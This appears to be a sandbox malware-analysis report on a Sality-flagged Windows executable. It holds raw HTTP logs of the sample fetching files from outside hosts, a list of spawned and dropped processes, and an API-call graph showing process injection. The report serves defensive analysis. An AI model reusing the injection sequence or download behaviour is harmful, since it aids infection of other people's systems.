                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: ampyazilim.com.tr
                                  Cache-Control: no-cache
                                  Jul 5, 2024 08:02:49.223248005 CEST | 933 | IN | HTTP/1.1 301 Moved Permanently
                                  Connection: Keep-Alive
                                  Keep-Alive: timeout=5, max=100
                                  content-type: text/html
                                  content-length: 707
                                  date: Fri, 05 Jul 2024 06:02:49 GMT
                                  location: http://ampyazilim.com.tr/images/xs2.jpg?1
                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  144 | 192.168.2.9 | 49857 | 37.230.104.89 | 80 | 7248 | C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Jul 5, 2024 08:02:49.239028931 CEST | 211 | OUT | GET /images/xs2.jpg?1 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: ampyazilim.com.tr
                                  Cache-Control: no-cache
                                  Connection: Keep-Alive
                                  Jul 5, 2024 08:02:49.950459957 CEST | 646 | IN | HTTP/1.1 200 OK
                                  Connection: Keep-Alive
                                  Keep-Alive: timeout=5, max=100
                                  cache-control: max-age=84600, public
                                  expires: Fri, 12 Jul 2024 06:02:49 GMT
                                  content-type: image/jpeg
                                  last-modified: Thu, 02 Dec 2021 06:14:43 GMT
                                  accept-ranges: bytes
                                  content-length: 340
                                  date: Fri, 05 Jul 2024 06:02:49 GMT


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  145 | 192.168.2.9 | 49858 | 54.244.188.177 | 80 | 7248 | C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Jul 5, 2024 08:02:50.247950077 CEST | 311 | OUT | GET /images/xs.jpg?2e78457f=1559268094 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: www.careerdesk.org
                                  Cache-Control: no-cache
                                  Cookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159366|1720159259|4|28|0
                                  Jul 5, 2024 08:02:50.976366043 CEST | 595 | IN | HTTP/1.1 200 OK
                                  Server: nginx
                                  Date: Fri, 05 Jul 2024 06:02:50 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Set-Cookie: btst=; path=/; domain=.www.careerdesk.org; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=; path=/; domain=www.careerdesk.org; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159370|1720159259|4|29|0; path=/; domain=.careerdesk.org; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                  Data Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port
                                  146 | 192.168.2.9 | 49859 | 44.221.84.105 | 80
                                  Timestamp | Bytes transferred | Direction | Data
                                  Jul 5, 2024 08:02:51.047559977 CEST | 302 | OUT | GET /xs.jpg?356cb59d=1979250507 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: arthur.niria.biz
                                  Cache-Control: no-cache
                                  Cookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159366|1720159259|3|28|0
                                  Jul 5, 2024 08:02:51.542800903 CEST | 586 | IN | HTTP/1.1 200 OK
                                  Server: nginx
                                  Date: Fri, 05 Jul 2024 06:02:51 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Set-Cookie: btst=; path=/; domain=.arthur.niria.biz; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=; path=/; domain=arthur.niria.biz; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159371|1720159259|4|29|0; path=/; domain=.niria.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                  Data Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  147 | 192.168.2.9 | 49860 | 44.221.84.105 | 80 | 7248 | C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Jul 5, 2024 08:02:51.809340954 CEST | 306 | OUT | GET /images/xs.jpg?3b3f41b1=-1631925289 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: apple-pie.in
                                  Cache-Control: no-cache
                                  Cookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159367|1720159260|4|28|0; snkz=8.46.123.33
                                  Jul 5, 2024 08:02:52.336535931 CEST | 334 | IN | HTTP/1.1 200 OK
                                  Server: nginx
                                  Date: Fri, 05 Jul 2024 06:02:52 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Set-Cookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159372|1720159260|4|29|0; path=/; domain=.apple-pie.in; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                  Data Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  148 | 192.168.2.9 | 49861 | 78.46.2.155 | 80 | 7248 | C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Jul 5, 2024 08:02:52.362721920 CEST | 193 | OUT | GET /xs.jpg?3fc1b58c=-1102317868 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: ahmediye.net
                                  Cache-Control: no-cache
                                  Jul 5, 2024 08:02:53.017049074 CEST | 403 | IN | HTTP/1.1 404 Not Found
                                  Date: Fri, 05 Jul 2024 06:02:52 GMT
                                  Server: Apache
                                  Content-Length: 258
                                  Content-Type: text/html; charset=iso-8859-1
                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at ahmediye.net Port 80</address></body></html>


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  149 | 192.168.2.9 | 49862 | 37.230.104.89 | 80 | 7248 | C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Jul 5, 2024 08:02:53.166032076 CEST | 205 | OUT | GET /images/xs2.jpg?a0c60b5a=1203532164 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: ampyazilim.com.tr
                                  Cache-Control: no-cache
                                  Jul 5, 2024 08:02:53.882483006 CEST | 933 | IN | HTTP/1.1 301 Moved Permanently
                                  Connection: Keep-Alive
                                  Keep-Alive: timeout=5, max=100
                                  content-type: text/html
                                  content-length: 707
                                  date: Fri, 05 Jul 2024 06:02:53 GMT
                                  location: http://ampyazilim.com.tr/images/xs2.jpg?1
                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>



                                  Target ID:6
                                  Start time:02:00:53
                                  Start date:05/07/2024
                                  Path:C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe"
                                  Imagebase:0x400000
                                  File size:1'233'920 bytes
                                  MD5 hash:99901509A53DFB9C77C1BE4D60763AFC
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_Sality, Description: Yara detected Sality, Source: 00000006.00000002.3795163173.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                  Reputation:low
                                  Has exited:false

                                  Target ID:9
                                  Start time:02:00:53
                                  Start date:05/07/2024
                                  Path:C:\Users\user\AppData\Local\Temp\YMZwp.exe
                                  Wow64 process (32bit):true
                                  Commandline:C:\Users\user\AppData\Local\Temp\YMZwp.exe
                                  Imagebase:0xb30000
                                  File size:15'872 bytes
                                  MD5 hash:56B2C3810DBA2E939A8BB9FA36D3CF96
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Antivirus matches:
                                  • Detection: 100%, Avira
                                  • Detection: 100%, Joe Sandbox ML
                                  • Detection: 100%, ReversingLabs
                                  Reputation:moderate
                                  Has exited:true

                                  Target ID:11
                                  Start time:02:00:54
                                  Start date:05/07/2024
                                  Path:C:\Windows\System32\fontdrvhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:"fontdrvhost.exe"
                                  Imagebase:0x7ff6791b0000
                                  File size:827'408 bytes
                                  MD5 hash:BBCB897697B3442657C7D6E3EDDBD25F
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Reputation:moderate
                                  Has exited:false

                                  Target ID:12
                                  Start time:02:00:54
                                  Start date:05/07/2024
                                  Path:C:\Windows\System32\dllhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                  Imagebase:0x7ff733cd0000
                                  File size:21'312 bytes
                                  MD5 hash:08EB78E5BE019DF044C26B14703BD1FA
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:moderate
                                  Has exited:false

                                  Target ID:13
                                  Start time:02:00:54
                                  Start date:05/07/2024
                                  Path:C:\Windows\System32\fontdrvhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:"fontdrvhost.exe"
                                  Imagebase:0x7ff6791b0000
                                  File size:827'408 bytes
                                  MD5 hash:BBCB897697B3442657C7D6E3EDDBD25F
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Reputation:moderate
                                  Has exited:false

                                  Target ID:14
                                  Start time:02:00:55
                                  Start date:05/07/2024
                                  Path:C:\Windows\System32\dwm.exe
                                  Wow64 process (32bit):false
                                  Commandline:"dwm.exe"
                                  Imagebase:0x7ff6f73e0000
                                  File size:94'720 bytes
                                  MD5 hash:5C27608411832C5B39BA04E33D53536C
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Reputation:moderate
                                  Has exited:false

                                  Target ID:15
                                  Start time:02:00:56
                                  Start date:05/07/2024
                                  Path:C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe" -ServerName:App.AppXtk181tbxbce2qsex02s8tw7hfxa9xb3t.mca
                                  Imagebase:0x7ff7f0c90000
                                  File size:1'663'328 bytes
                                  MD5 hash:9B8DE9D4EDF68EEF2C1E490ABC291567
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Reputation:low
                                  Has exited:false

                                  Target ID:18
                                  Start time:02:00:57
                                  Start date:05/07/2024
                                  Path:C:\Windows\System32\RuntimeBroker.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\System32\RuntimeBroker.exe -Embedding
                                  Imagebase:0x7ff73df00000
                                  File size:103'288 bytes
                                  MD5 hash:BA4CFE6461AFA1004C52F19C8F2169DC
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Reputation:moderate
                                  Has exited:false

                                  Target ID:21
                                  Start time:02:01:00
                                  Start date:05/07/2024
                                  Path:C:\Windows\SysWOW64\WerFault.exe
                                  Wow64 process (32bit):true
                                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7348 -s 1624
                                  Imagebase:0x6e0000
                                  File size:483'680 bytes
                                  MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  Target ID:22
                                  Start time:02:01:06
                                  Start date:05/07/2024
                                  Path:C:\Windows\System32\sihost.exe
                                  Wow64 process (32bit):false
                                  Commandline:sihost.exe
                                  Imagebase:0x7ff700bc0000
                                  File size:111'616 bytes
                                  MD5 hash:A21E7719D73D0322E2E7D61802CB8F80
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Reputation:moderate
                                  Has exited:false

                                  Target ID:23
                                  Start time:02:01:10
                                  Start date:05/07/2024
                                  Path:C:\Windows\System32\svchost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                                  Imagebase:0x7ff77afe0000
                                  File size:55'320 bytes
                                  MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:false

                                  Target ID:25
                                  Start time:02:01:11
                                  Start date:05/07/2024
                                  Path:C:\Windows\System32\svchost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s WpnUserService
                                  Imagebase:0x7ff77afe0000
                                  File size:55'320 bytes
                                  MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:false

                                  Target ID:26
                                  Start time:02:01:12
                                  Start date:05/07/2024
                                  Path:C:\Windows\System32\ctfmon.exe
                                  Wow64 process (32bit):false
                                  Commandline:"ctfmon.exe"
                                  Imagebase:0x7ff7a3870000
                                  File size:11'264 bytes
                                  MD5 hash:B625C18E177D5BEB5A6F6432CCF46FB3
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Reputation:moderate
                                  Has exited:false

                                  Target ID:27
                                  Start time:02:01:12
                                  Start date:05/07/2024
                                  Path:C:\Windows\explorer.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\Explorer.EXE
                                  Imagebase:0x7ff633410000
                                  File size:5'141'208 bytes
                                  MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:false

                                  Target ID:28
                                  Start time:02:01:15
                                  Start date:05/07/2024
                                  Path:C:\Windows\System32\svchost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
                                  Imagebase:0x7ff77afe0000
                                  File size:55'320 bytes
                                  MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Has exited:false

                                  Target ID:29
                                  Start time:02:01:15
                                  Start date:05/07/2024
                                  Path:C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
                                  Imagebase:0x7ff663e30000
                                  File size:793'416 bytes
                                  MD5 hash:5CDDF06A40E89358807A2B9506F064D9
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Has exited:false

                                  Target ID:30
                                  Start time:02:01:18
                                  Start date:05/07/2024
                                  Path:C:\Windows\System32\RuntimeBroker.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\System32\RuntimeBroker.exe -Embedding
                                  Imagebase:0x7ff73df00000
                                  File size:103'288 bytes
                                  MD5 hash:BA4CFE6461AFA1004C52F19C8F2169DC
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Has exited:false

                                  Target ID:31
                                  Start time:02:01:19
                                  Start date:05/07/2024
                                  Path:C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
                                  Imagebase:0x7ff7df7f0000
                                  File size:3'671'400 bytes
                                  MD5 hash:5E1C9231F1F1DCBA168CA9F3227D9168
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Has exited:false

                                  Target ID:32
                                  Start time:02:01:30
                                  Start date:05/07/2024
                                  Path:C:\Windows\System32\RuntimeBroker.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\System32\RuntimeBroker.exe -Embedding
                                  Imagebase:0x7ff73df00000
                                  File size:103'288 bytes
                                  MD5 hash:BA4CFE6461AFA1004C52F19C8F2169DC
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Has exited:false

                                  Target ID:33
                                  Start time:02:01:31
                                  Start date:05/07/2024
                                  Path:C:\Windows\System32\RuntimeBroker.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\System32\RuntimeBroker.exe -Embedding
                                  Imagebase:0x7ff73df00000
                                  File size:103'288 bytes
                                  MD5 hash:BA4CFE6461AFA1004C52F19C8F2169DC
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Has exited:false

                                  Target ID:34
                                  Start time:02:01:31
                                  Start date:05/07/2024
                                  Path:C:\Windows\System32\smartscreen.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\System32\smartscreen.exe -Embedding
                                  Imagebase:0x7ff6d8c90000
                                  File size:2'378'752 bytes
                                  MD5 hash:02FB7069B8D8426DC72C9D8A495AF55A
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:35
                                  Start time:02:01:32
                                  Start date:05/07/2024
                                  Path:C:\Windows\System32\ApplicationFrameHost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\ApplicationFrameHost.exe -Embedding
                                  Imagebase:0x7ff674640000
                                  File size:78'456 bytes
                                  MD5 hash:D58A8A987A8DAFAD9DC32A548CC061E7
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Has exited:false

                                  Target ID:36
                                  Start time:02:01:33
                                  Start date:05/07/2024
                                  Path:C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe" -ServerName:App.AppXc75wvwned5vhz4xyxxecvgdjhdkgsdza.mca
                                  Imagebase:0x7ff61dec0000
                                  File size:19'456 bytes
                                  MD5 hash:6C44453CD661FC2DB18E4C09C4940399
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Has exited:false

                                  Target ID:37
                                  Start time:02:01:33
                                  Start date:05/07/2024
                                  Path:C:\Windows\System32\RuntimeBroker.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\System32\RuntimeBroker.exe -Embedding
                                  Imagebase:0x7ff73df00000
                                  File size:103'288 bytes
                                  MD5 hash:BA4CFE6461AFA1004C52F19C8F2169DC
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Has exited:false

                                  Target ID:38
                                  Start time:02:01:33
                                  Start date:05/07/2024
                                  Path:C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXjd5de1g66v206tj52m9d0dtpppx4cgpn.mca
                                  Imagebase:0x7ff6668d0000
                                  File size:19'232 bytes
                                  MD5 hash:F050189D49E17D0D340DE52E9E5B711F
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Has exited:false

                                  Target ID:39
                                  Start time:02:01:35
                                  Start date:05/07/2024
                                  Path:C:\Windows\SysWOW64\cscript.exe
                                  Wow64 process (32bit):true
                                  Commandline:"cscript" "C:\Program Files (x86)\Microsoft Office\Office16\OSPP.VBS" /dstatus
                                  Imagebase:0xc60000
                                  File size:144'896 bytes
                                  MD5 hash:CB601B41D4C8074BE8A84AED564A94DC
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:false

                                  Target ID:40
                                  Start time:02:01:35
                                  Start date:05/07/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0x4
                                  Imagebase:0x7ff70f010000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:false

                                  Target ID:41
                                  Start time:02:01:36
                                  Start date:05/07/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0x4
                                  Imagebase:0x7ff70f010000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:false

                                    Execution Graph

                                    Execution Coverage:6%
                                    Dynamic/Decrypted Code Coverage:86%
                                    Signature Coverage:18.6%
                                    Total number of Nodes:1428
                                    Total number of Limit Nodes:62
2424bd0 27 API calls 41797->42543 41798 24255b0 42541 242470f SetFileAttributesA DeleteFileA 41798->42541 42542 2424649 CreateFileA CloseHandle 41801->42542 41802 24255d2 41802->41769 41803 24255d6 CreateThread 41802->41803 41804 24210e5 3 API calls 41803->41804 42544 2425388 25 API calls 41803->42544 41804->41773 41806 2433600 41805->41806 41807 242391e htons socket 41806->41807 41808 2423a0a setsockopt bind 41807->41808 41810 2423a05 41807->41810 41809 2423a53 41808->41809 41808->41810 41809->41810 41811 2423a60 recvfrom 41809->41811 41812 2423b21 closesocket 41810->41812 41813 2423b2e RtlExitUserThread 41810->41813 41811->41809 41814 2423a9c InterlockedExchange CreateThread 41811->41814 41812->41813 41813->41810 41815 24210e5 3 API calls 41814->41815 42546 2423536 42 API calls 41814->42546 41816 2423afd 41815->41816 41816->41809 41817 2423b09 Sleep 41816->41817 41817->41816 41819 242d509 CloseHandle 41818->41819 41820 242d2f9 Process32First 41818->41820 41819->41681 41821 242d40b Process32Next 41820->41821 41822 242d32d 41820->41822 41821->41819 41833 242d426 41821->41833 41822->41821 41823 242d33a lstrlen 41822->41823 41824 242d364 lstrcpy 41823->41824 41825 242d34c lstrcpyn 41823->41825 41827 242d378 7 API calls 41824->41827 41825->41827 41826 242d433 lstrlen 41828 242d445 lstrcpyn 41826->41828 41829 242d45d lstrcpy 41826->41829 41827->41821 41830 242d3f5 41827->41830 41831 242d471 7 API calls 41828->41831 41829->41831 41832 242cc92 38 API calls 41830->41832 41831->41833 41834 242d408 41832->41834 41833->41821 41833->41826 41836 242cc92 41833->41836 41834->41821 41837 2433600 41836->41837 41838 242ccbc OpenProcess 41837->41838 41839 242cf43 OpenProcessToken 41838->41839 41840 242cd96 GetLastError 41838->41840 41841 242cf69 GetTokenInformation 41839->41841 41878 242cdde 41839->41878 41842 242cda5 GetVersionExA 41840->41842 41840->41878 41844 242cf93 GetLastError 41841->41844 41841->41878 41843 242cdea GetCurrentThread OpenThreadToken 41842->41843 41842->41878 
41845 242ce10 GetLastError 41843->41845 41846 242ce4f LookupPrivilegeValueA AdjustTokenPrivileges 41843->41846 41847 242cfaa GetProcessHeap RtlAllocateHeap 41844->41847 41844->41878 41852 242ce29 GetCurrentProcess OpenProcessToken 41845->41852 41845->41878 41854 242cea1 CloseHandle 41846->41854 41855 242ceba GetLastError 41846->41855 41853 242cfdb GetTokenInformation 41847->41853 41847->41878 41848 242d250 FindCloseChangeNotification 41849 242d267 41848->41849 41850 242d270 CloseHandle 41849->41850 41851 242d27d 41849->41851 41850->41851 41856 242d286 GetProcessHeap HeapFree 41851->41856 41857 242d29c 41851->41857 41852->41846 41852->41878 41858 242d00f LookupAccountSidA 41853->41858 41853->41878 41854->41878 41859 242cee0 OpenProcess AdjustTokenPrivileges FindCloseChangeNotification 41855->41859 41860 242cec7 CloseHandle 41855->41860 41856->41857 41857->41833 41862 242d063 41858->41862 41858->41878 41861 242cf35 41859->41861 41859->41878 41860->41878 41861->41839 41863 242d06e lstrcmpiA 41862->41863 41862->41878 41864 242d0b0 CreateMutexA 41863->41864 41865 242d084 lstrcmpiA 41863->41865 41864->41878 41865->41864 41866 242d09a lstrcmpiA 41865->41866 41866->41864 41867 242d0ca VirtualAllocEx 41866->41867 41869 242d102 WriteProcessMemory 41867->41869 41870 242d169 VirtualAllocEx 41867->41870 41871 242d134 CreateRemoteThread 41869->41871 41869->41878 41872 242d197 41870->41872 41870->41878 41873 242d162 41871->41873 41871->41878 41874 242d1aa lstrlen 41872->41874 41873->41870 41875 2432ceb 41874->41875 41876 242d1c8 WriteProcessMemory 41875->41876 41877 242d1fc CreateRemoteThread 41876->41877 41876->41878 41877->41878 41878->41848 41878->41849 41880 2425722 41879->41880 41881 242573a SetFileAttributesA DeleteFileA 41879->41881 41886 2429652 41880->41886 41883 2425738 41881->41883 41883->41699 41885->41699 41887 242967c 41886->41887 41986 24213e8 InterlockedExchange 41887->41986 41889 242977f 41987 24213e8 InterlockedExchange 41889->41987 41891 24297c2 lstrcpy 
